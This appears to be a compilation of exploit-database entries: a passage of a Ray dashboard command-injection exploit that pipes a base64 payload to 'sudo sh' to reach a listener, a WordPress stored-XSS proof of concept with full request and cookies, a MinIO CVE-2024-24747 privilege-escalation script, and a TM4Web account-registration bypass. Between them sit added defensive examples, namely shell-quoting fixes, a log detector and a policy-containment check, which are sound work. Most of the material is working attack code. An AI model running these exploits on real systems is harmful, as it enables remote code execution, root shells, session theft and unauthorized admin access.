line that the dashboard<br />    # runs through a shell: the backticks run the decoded payload during command substitution,<br />    # $IFS replaces the space that would otherwise end the parameter, and "sudo sh" yields a<br />    # root shell where passwordless sudo is configured. The pid value does not matter for the<br />    # injection, the substitution runs before py-spy is ever started.<br />    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload + ' |base64$IFS-d|sudo%20sh`'<br />    print(exp_url)<br />    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br />    try:<br />        response = requests.get(url=exp_url, headers=headers, verify=False, timeout=30)<br />    except requests.exceptions.ReadTimeout:<br />        # The request does not return while the injected shell is alive<br />        print("[+]Request timed out while the payload is running, check your listener!")<br />        return<br />    if response.status_code == 200:<br />        print("[-]ERROR: Exploit Failed, please check the payload.")<br />    else:<br />        print("[+]Exploit is finished, please check your machine!")<br /><br /><br />if __name__ == '__main__':<br />    parser = argparse.ArgumentParser(<br />        description='''<br />⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀<br />⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄<br />⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄<br />⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃<br /><br />⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄<br />⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄<br />⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀<br />⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄<br />        ''',<br />        formatter_class=argparse.RawDescriptionHelpFormatter,<br />    )<br />    parser.add_argument('-t', '--target', type=str, required=True, help='target ip or base URL of the Ray dashboard')<br />    parser.add_argument('-p', '--port', type=str, default='8265', required=False, help='target dashboard port (Ray default 8265)')<br />    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')<br />    parser.add_argument('-P', '--lport', type=str, default='80', required=False, help='listening port')<br />    args = parser.parse_args()<br />    # The dashboard's ip parameter names the node to profile; here that is the target host itself<br />    ip = args.target.split("://")[-1]<br />    targeturl = check_url(args.target, args.port)<br />    print("[*] Checking in url: " + targeturl)<br />    exp(targeturl, ip, args.lhost, args.lport)<br /><br /></code></pre>
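Added example, not Ray code: the shape of the flaw (a request field interpolated into a shell command line) beside two fixes, an argv list without a shell and shlex.quote() where a shell cannot be avoided, and a detector that flags /worker/cpu_profile requests whose decoded format parameter carries shell metacharacters. The allowlist of formats and the access-log lines are constructed for the demo.

```python
import re
import shlex
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist for the demo; not Ray's real option set
ALLOWED_FORMATS = {"flamegraph", "raw", "speedscope"}


def build_profile_cmd_vulnerable(pid, duration, fmt) -> str:
    """Shape of the flaw: request fields are interpolated into one string that is
    then executed by a shell, so backticks or $(...) in `fmt` run as commands."""
    return f"sudo py-spy record -o /tmp/profile --pid {pid} --duration {duration} --format {fmt}"


def build_profile_cmd_quoted(pid, duration, fmt) -> str:
    """If a shell cannot be avoided, shlex.quote() makes each field a single shell
    word, so metacharacters are passed literally to py-spy."""
    return ("sudo py-spy record -o /tmp/profile --pid " + shlex.quote(str(pid))
            + " --duration " + shlex.quote(str(duration)) + " --format " + shlex.quote(fmt))


def build_profile_cmd_safe(pid, duration, fmt) -> list:
    """Preferred fix: validate every field against its expected type or allowlist and
    return an argv list for subprocess without shell=True."""
    if fmt not in ALLOWED_FORMATS:
        raise ValueError(f"unsupported format: {fmt!r}")
    pid = int(pid)
    duration = float(duration)
    if pid <= 0 or not 0 < duration <= 60:
        raise ValueError("pid or duration out of range")
    return ["py-spy", "record", "-o", "/tmp/profile", "--pid", str(pid),
            "--duration", str(duration), "--format", fmt]


SHELL_META = re.compile(r"[`$|;&<>(){}\\\n]")


def suspicious_cpu_profile_requests(access_log_lines: list) -> list:
    """Return the decoded format values of /worker/cpu_profile requests that contain
    shell metacharacters (the exploit's value decodes to a backtick command)."""
    hits = []
    for line in access_log_lines:
        match = re.search(r'"GET (\S+) HTTP', line)
        if not match or "/worker/cpu_profile" not in match.group(1):
            continue
        query = urlsplit(match.group(1)).query
        for fmt in parse_qs(query).get("format", []):
            if SHELL_META.search(fmt):
                hits.append(fmt)
    return hits


# Constructed dashboard access-log lines for the demo
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Apr/2024:12:00:00 +0000] "GET /worker/cpu_profile?pid=3354&ip=10.0.0.7&duration=5&native=0&format=flamegraph HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Apr/2024:12:01:00 +0000] "GET /worker/cpu_profile?pid=3354&ip=10.0.0.7&duration=5&native=0&format=%60echo%20aWQ%3D%20%7Cbase64%24IFS-d%7Csudo%20sh%60 HTTP/1.1" 500 0',
    '10.0.0.9 - - [10/Apr/2024:12:02:00 +0000] "GET /api/version HTTP/1.1" 200 80',
]

if __name__ == "__main__":
    injected = "`id`"
    print(build_profile_cmd_vulnerable(3354, 5, injected))
    print(build_profile_cmd_quoted(3354, 5, injected))
    print(build_profile_cmd_safe(3354, 5, "flamegraph"))
    print(suspicious_cpu_profile_requests(SAMPLE_LOG))
```

The detector percent-decodes before matching, which matters here: a client library encodes the backticks and spaces of the exploit URL, so the raw log line shows `%60` and `%24IFS` rather than the characters themselves.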
<pre><code># Exploit Title: WordPress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)<br /># Date: 22 March 2024<br /># Exploit Author: Erdemstar<br /># Vendor: https://wordpress.com/<br /># Version: 1.32<br /><br /># Proof Of Concept:<br />1. As a logged-in user with access to the plugin page (wp-admin/admin.php?page=playlists_yt_free), click "Add a new playlist" and enter the XSS payload below in the "Name" or "Playlist ID" field. The value is stored unsanitised and executes when the playlist is rendered (stored XSS). The request below carries the form's _wpnonce, so replaying it needs a fresh nonce and session cookie.<br /><br /># PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns<br /># Vulnerable Properties name: name, playlist_id<br /># Payload: "><script>alert(document.cookie)</script><br /># Request:<br />POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2<br />Host: erdemstar.local<br />Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9<br />Content-Length: 178<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "macOS"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://erdemstar.local<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36<br />Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br /><br />_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000<br /><br /><br /></code></pre>
<pre><code># Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation<br /># Date: 2024-04-11<br /># Exploit Author: Jenson Zhao<br /># Vendor Homepage: https://min.io/<br /># Software Link: https://github.com/minio/minio/<br /># Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z<br /># Tested on: Windows 10<br /># CVE : CVE-2024-24747<br /># Required before execution: pip install minio requests<br />#<br /># A service account created with a restricted policy can call the admin API<br /># update-service-account on itself and replace that policy, gaining the rights of its<br /># parent user. This check logs in to the Console, creates the buckets pocpublic and<br /># pocprivate, creates a service account that may only use pocpublic, sends the policy<br /># update through the S3/admin API signed with that account, and compares the bucket<br /># listing before and after. Everything it created is deleted at the end.<br />#<br /># Ports: -p is the Console API port (/api/v1/..., 9090 by default) and -c is the S3/admin<br /># API port (signed requests, 9000 by default).<br /><br />import argparse<br />import base64<br />import datetime<br />import json<br />import traceback<br />import urllib.parse<br />from xml.dom.minidom import parseString<br /><br />import requests<br />import urllib3<br />from minio.credentials import Credentials<br />from minio.signer import sign_v4_s3<br /><br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /><br />class CVE_2024_24747:<br />    new_buckets = []<br />    old_buckets = []<br /><br />    def __init__(self, host, port, console_port, accesskey, secretkey, https=False):<br />        self.bucket_names = ['pocpublic', 'pocprivate']<br />        # The update-service-account body in console_exp() is a pre-encrypted madmin payload<br />        # bound to this secret key, so these credentials cannot be changed without<br />        # regenerating it<br />        self.new_accesskey = 'miniocvepoc'<br />        self.new_secretkey = 'MINIOcvePOC'<br />        self.headers = {<br />            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',<br />            'Content-Type': 'application/json',<br />            'Accept': '*/*'<br />        }<br />        self.accesskey = accesskey<br />        self.secretkey = secretkey<br />        self.https = https<br />        scheme = "https://" if https else "http://"<br />        self.url = scheme + host + ":" + port                  # Console API<br />        self.console_url = scheme + host + ":" + console_port  # S3 / admin API<br />        self.credits = Credentials(<br />            access_key=self.new_accesskey,<br />            secret_key=self.new_secretkey<br />        )<br />        self.login()<br />        try:<br />            self.create_buckets()<br />            self.create_accesskey()<br />            self.old_buckets = self.console_ls()<br />            self.console_exp()<br />            self.new_buckets = self.console_ls()<br />        except Exception:<br />            traceback.print_exc()<br />        finally:<br />            self.delete_accesskey()<br />            self.delete_buckets()<br />        if len(self.new_buckets) > len(self.old_buckets):<br />            print("The MinIO instance is affected by CVE-2024-24747!")<br />            print("Before the exploit, the buckets are : " + str(self.old_buckets))<br />            print("After the exploit, the buckets are : " + str(self.new_buckets))<br />        else:<br />            print("The MinIO instance is not affected by CVE-2024-24747.")<br /><br />    def login(self):<br />        url = self.url + "/api/v1/login"<br />        payload = json.dumps({<br />            "accessKey": self.accesskey,<br />            "secretKey": self.secretkey<br />        })<br />        self.session = requests.session()<br />        self.session.verify = False<br />        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code<br />        if status_code != 204:<br />            print('Login failed! Please check if the input accesskey and secretkey are correct!')<br />            raise SystemExit(1)<br /><br />    def create_buckets(self):<br />        url = self.url + "/api/v1/buckets"<br />        for name in self.bucket_names:<br />            payload = json.dumps({<br />                "name": name,<br />                "versioning": False,<br />                "locking": False<br />            })<br />            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code<br />            if status_code != 200:<br />                print("Creating bucket " + name + " failed!")<br /><br />    def delete_buckets(self):<br />        for name in self.bucket_names:<br />            url = self.url + "/api/v1/buckets/" + name<br />            status_code = self.session.request("DELETE", url, headers=self.headers).status_code<br />            if status_code != 204:<br />                print("Deleting bucket " + name + " failed!")<br /><br />    def create_accesskey(self):<br />        # Service account restricted to the pocpublic bucket<br />        url = self.url + "/api/v1/service-account-credentials"<br />        payload = json.dumps({<br />            "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}",<br />            "accessKey": self.new_accesskey,<br />            "secretKey": self.new_secretkey<br />        })<br />        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code<br />        if status_code != 201:<br />            print("Creating access key " + self.new_accesskey + " failed!")<br /><br />    def delete_accesskey(self):<br />        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')<br />        status_code = self.session.request("DELETE", url, headers=self.headers).status_code<br />        if status_code != 204:<br />            print("Deleting access key " + self.new_accesskey + " failed!")<br /><br />    def headers_gen(self, url, sha256, method):<br />        # AWS SigV4 headers for the S3/admin API, signed with the new service account<br />        datetimes = datetime.datetime.utcnow()<br />        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')<br />        urls = urllib.parse.urlparse(url)<br />        headers = {<br />            'X-Amz-Content-Sha256': sha256,<br />            'X-Amz-Date': datetime_str,<br />            'Host': urls.netloc,<br />        }<br />        headers = sign_v4_s3(<br />            method=method,<br />            url=urls,<br />            region='us-east-1',<br />            headers=headers,<br />            credentials=self.credits,<br />            content_sha256=sha256,<br />            date=datetimes,<br />        )<br />        return headers<br /><br />    def console_ls(self):<br />        # ListBuckets as the service account: shows which buckets its policy lets it see<br />        url = self.console_url + "/"<br />        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  # SHA-256 of an empty body<br />        headers = self.headers_gen(url, sha256, 'GET')<br />        response = requests.get(url, headers=headers, verify=False)<br />        DOMTree = parseString(response.text)<br />        collection = DOMTree.documentElement<br />        buckets = collection.getElementsByTagName("Bucket")<br />        bucket_names = []<br />        for bucket in buckets:<br />            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)<br />        return bucket_names<br /><br />    def console_exp(self):<br />        # The service account updates its own policy. The body is the encrypted madmin request<br />        # and sha256 is its content hash, which the SigV4 signature covers<br />        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey<br />        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"<br />        headers = self.headers_gen(url, sha256, 'POST')<br />        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"<br />        content = bytes.fromhex(hex_string)<br />        response = requests.post(url, headers=headers, data=content, verify=False)<br />        if response.status_code != 204:<br />            print("Promoting " + self.new_accesskey + " failed (status " + str(response.status_code) + ")!")<br /><br /><br />if __name__ == '__main__':<br />    logo = """<br /> ____ ___ ____ _ _ ____ _ _ _____ _ _ _____ <br /> ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ |<br /> / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / / <br />| (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / / <br /> \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/ <br />    """<br />    print(logo)<br />    parser = argparse.ArgumentParser()<br />    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")<br />    parser.add_argument("-a", "--accesskey", required=True, help="MinIO access key of the target. example: minioadmin")<br />    parser.add_argument("-s", "--secretkey", required=True, help="MinIO secret key of the target. example: minioadmin")<br />    parser.add_argument("-c", "--console_port", required=True, help="S3/admin API port of the target (signed requests). example: 9000")<br />    parser.add_argument("-p", "--port", required=True, help="Console API port of the target (/api/v1). example: 9090")<br />    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")<br />    args = parser.parse_args()<br />    CVE_2024_24747(args.host, args.port, args.console_port, args.accesskey, args.secretkey, args.https)<br /><br /></code></pre>
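Added example (not MinIO code): a simplified policy containment check of the kind a server needs before letting a service account change its own policy, which is the guard CVE-2024-24747 lacked. It uses the pocpublic policy from the script above as the account's current policy, a constructed broader policy as the escalation request, and a constructed narrower one as a legitimate update. Only Allow statements and the `*` wildcard are handled; Deny statements, conditions and `?` are outside this simplification.

```python
import json
import re

# The restricted policy the script above attaches to the service account (same JSON)
CURRENT_POLICY = json.loads("""
{ "Version": "2012-10-17",
  "Statement": [ { "Effect": "Allow", "Action": [ "s3:*" ],
                   "Resource": [ "arn:aws:s3:::pocpublic", "arn:aws:s3:::pocpublic/*" ] } ] }
""")

# Constructed: what an escalated policy would have to grant for pocprivate to become visible
REQUESTED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["s3:*"], "Resource": ["arn:aws:s3:::*"]}],
}

# Constructed: a narrower policy (read-only on pocpublic) that a legitimate update may ask for
NARROWER_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
                   "Resource": ["arn:aws:s3:::pocpublic", "arn:aws:s3:::pocpublic/*"]}],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def iam_match(pattern: str, value: str) -> bool:
    """IAM-style '*' wildcard match ('?' is treated literally in this simplification).
    Because '*' is the only wildcard, a pattern that matches a wildcard-bearing value
    character for character also covers every expansion of that value, so the check
    stays sound when both sides contain '*'."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, value) is not None


def allow_grants(policy: dict) -> list:
    """Flatten the Allow statements into (action, resource) pairs."""
    grants = []
    for statement in policy.get("Statement", []):
        if statement.get("Effect") != "Allow":
            continue
        for action in _as_list(statement.get("Action", [])):
            for resource in _as_list(statement.get("Resource", [])):
                grants.append((action, resource))
    return grants


def is_subset(requested: dict, current: dict) -> bool:
    """True when every Allow grant of `requested` is covered by some grant of `current`."""
    current_grants = allow_grants(current)
    return all(
        any(iam_match(ca, action) and iam_match(cr, resource) for ca, cr in current_grants)
        for action, resource in allow_grants(requested)
    )


def update_service_account_policy(current: dict, requested: dict, caller_is_admin: bool) -> dict:
    """Illustrative guard for an update-service-account handler: a non-admin caller may
    only narrow its policy, never widen it."""
    if caller_is_admin or is_subset(requested, current):
        return requested
    raise PermissionError("requested policy grants more than the current one")


if __name__ == "__main__":
    print("narrower accepted:",
          update_service_account_policy(CURRENT_POLICY, NARROWER_POLICY, False) is NARROWER_POLICY)
    try:
        update_service_account_policy(CURRENT_POLICY, REQUESTED_POLICY, False)
    except PermissionError as err:
        print("escalation refused:", err)
```

Run against the script's scenario, the request that would make pocprivate appear in the listing is refused for the service account itself and only succeeds when an admin caller submits it.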
<pre><code>CVE ID: CVE-2023-27195<br /><br />Description:<br />An access control issue in Trimble TM4Web v22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account, attackers are also able to register new Administrator accounts with full rights and privileges.<br /><br />Vulnerability Type: Broken Access Control<br /><br />Vendor of Product: Trimble - Transportation (https://transportation.trimble.com/products/TM4Web)<br /><br />Affected Product Code Base: TM4Web v22.2.0<br /><br />Affected Component: User registration process<br /><br />Attack Type: Remote<br /><br />Impact: Privilege escalation / authentication bypass<br /><br />Attack Vectors:<br /><br />1. Accessing the last access code<br /><br />GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=<br />Host: example.host.com<br /><br />This unauthenticated request with an empty uuid returns the last registration access code, which is used as ACCESS_CODE in the next step.<br /><br />2. Sending a PUT request to create a new user account with the previously retrieved access code<br /><br />PUT /inc/tm_ajax.msw<br />Host: example.host.com<br />[...]<br /><br />WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser<br /><br />Discoverer: Clément Cruchet (lutzenfried)<br /><br />References:<br />- Official website: https://transportation.trimble.com/products/TM4Web<br /><br /></code></pre>